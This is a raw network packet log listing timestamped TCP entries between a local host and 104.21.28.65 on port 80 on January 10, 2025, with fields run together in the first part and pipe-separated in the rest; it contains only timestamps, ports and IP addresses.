                                                                              Jan 10, 2025 18:54:19.152364969 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:19.181987047 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.184032917 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.184051037 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.184081078 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:19.187686920 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.187707901 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.187778950 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:19.190150976 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.190174103 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.190198898 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:19.191288948 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.191303968 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.191329002 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:19.191559076 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.191643953 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.191668987 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:19.191699028 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:19.780461073 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:20.803684950 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:20.808693886 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:20.808926105 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:20.816381931 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:20.821227074 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.518702030 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.518754959 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.518794060 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.518829107 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.518866062 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.518887997 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.518918037 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.518955946 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.518980026 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.518986940 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.519023895 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.519030094 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.527939081 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.528001070 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.528006077 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.528034925 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.528124094 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.528150082 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.528183937 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.528223038 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.605899096 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.605920076 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.605935097 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.605942965 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.605967999 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.605982065 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.606019020 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.606093884 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.606147051 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.606559038 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.606611967 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.606630087 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.606643915 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.606654882 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.606679916 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.607194901 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.607215881 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.607227087 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.607239008 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.607281923 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.607332945 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.607345104 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.607383966 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.608082056 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.615835905 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.615866899 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.615906000 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.615920067 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.615957975 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.615972996 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.615994930 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.616028070 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.616034031 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.616065025 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.616101980 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.616573095 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.616601944 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.616641998 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.693449974 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.693480015 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.693492889 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.693510056 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.693531036 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.693660021 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.693742990 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.693762064 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.693775892 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.693788052 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.693790913 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.693804026 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.693823099 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.693856955 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.694363117 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.694375992 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.694389105 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.694425106 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.694506884 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.694519043 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.694530964 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.694547892 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.694575071 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.695185900 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.695256948 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.695270061 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.695297956 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.695322990 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.695337057 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.695349932 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.695374966 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.695390940 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.696132898 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.696154118 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.696166992 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.696178913 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.696191072 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.696197033 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.696203947 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.696218967 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.696244001 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.696911097 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.696944952 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.696958065 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.696981907 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.696986914 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.697021961 CET4971480192.168.2.8104.21.28.65
Jan 10, 2025 18:54:21.710969925 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.711009979 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.711021900 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.711034060 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.711046934 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.711102962 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.711119890 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.711203098 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.711250067 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.711369991 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.711381912 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.711393118 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.711419106 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.711438894 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.711601019 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.711612940 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.711625099 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.711653948 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.711659908 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.711667061 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.711688995 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.759439945 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.759519100 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.759531021 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.759602070 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.759680986 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.817502022 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.817522049 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.817534924 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.817548990 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.817639112 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.817661047 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.817673922 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.817696095 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.817707062 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.817718983 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.817734957 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.817740917 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.817749977 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.817780972 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.817819118 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.817832947 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.817873001 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.818491936 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.818528891 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.818542957 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.818562984 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.818586111 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.818694115 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.818706989 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.818727970 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.818738937 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.818752050 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.818766117 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.818837881 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.818837881 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.818837881 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.819502115 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.819516897 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.819531918 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.819552898 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.819600105 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.819612026 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.819632053 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.819637060 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.819645882 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.819668055 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.819678068 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.819680929 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.819701910 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.820406914 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.820427895 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.820441961 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.820468903 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.820477962 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.820538998 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.820550919 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.820563078 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.820580959 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.820589066 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.820602894 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.820616007 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.820626974 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.820652008 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.821382046 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.821396112 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.821408987 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.821427107 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.821486950 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.821499109 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.821511984 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.821521997 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.821525097 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.821547985 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.822412014 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.822447062 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.822460890 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.822467089 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.822480917 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.822499037 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.822590113 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.822613001 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.822623968 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.822627068 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.822653055 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.822809935 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.822870970 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.822882891 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.822905064 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.822928905 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.822942019 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.822954893 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.822964907 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.822969913 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.822992086 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.823072910 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.823086023 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.823107004 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.823792934 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.823807001 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.823822021 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.823828936 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.823856115 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.823896885 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.823908091 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.823920965 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.823932886 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.823939085 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.823981047 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.824413061 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.824424982 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.824459076 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.860016108 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.860059023 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.860069990 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.860084057 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.860205889 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.940572023 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.940639973 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.940663099 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.940676928 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.940691948 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.940711021 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.940731049 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.940743923 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.940756083 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.940813065 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.940865040 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.940895081 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.940907955 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.940922022 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.940936089 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.940948963 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.940970898 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.940983057 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.940989017 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.940996885 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.941011906 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.941015959 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.941047907 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.941056967 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.941085100 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.941096067 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.941097975 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.941137075 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.941176891 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.941194057 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.941200018 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.941211939 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.941231966 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.941265106 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.941296101 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.941382885 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.941395044 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.941407919 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.941420078 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.941425085 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.941457033 CET | 49714 | 80 | 192.168.2.8 | 104.21.28.65
Jan 10, 2025 18:54:21.941494942 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
Jan 10, 2025 18:54:21.941508055 CET | 80 | 49714 | 104.21.28.65 | 192.168.2.8
